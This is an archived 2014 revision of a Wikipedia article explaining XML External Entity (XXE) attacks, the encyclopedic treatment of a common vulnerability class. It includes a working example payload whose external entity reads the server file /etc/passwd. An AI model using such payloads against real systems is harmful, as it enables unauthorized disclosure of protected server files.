Jump to content

XML external entity attack

From Wikipedia, the free encyclopedia

This is an old revision of this page, as edited by Royanee (talk | contribs) at 21:37, 14 August 2014 (Fix naming convention to match industry standards; reference OWASP's article). The present address (URL) is a permanent link to this revision, which may differ significantly from the current revision.

An XML External Entity (XXE) attack[1] is a type of computer security vulnerability typically found in Web applications. XXE enables attackers to disclose normally protected files from a server or connected network.

The XML standard includes the idea of an external general parsed entity (an external entity). During parsing of the XML document, the parser will expand these links and include the content of the URI in the returned XML document.

Example external entity attack:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ 
    <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> 
]>
<xxx>&xxeattack;</xxx>

See also

References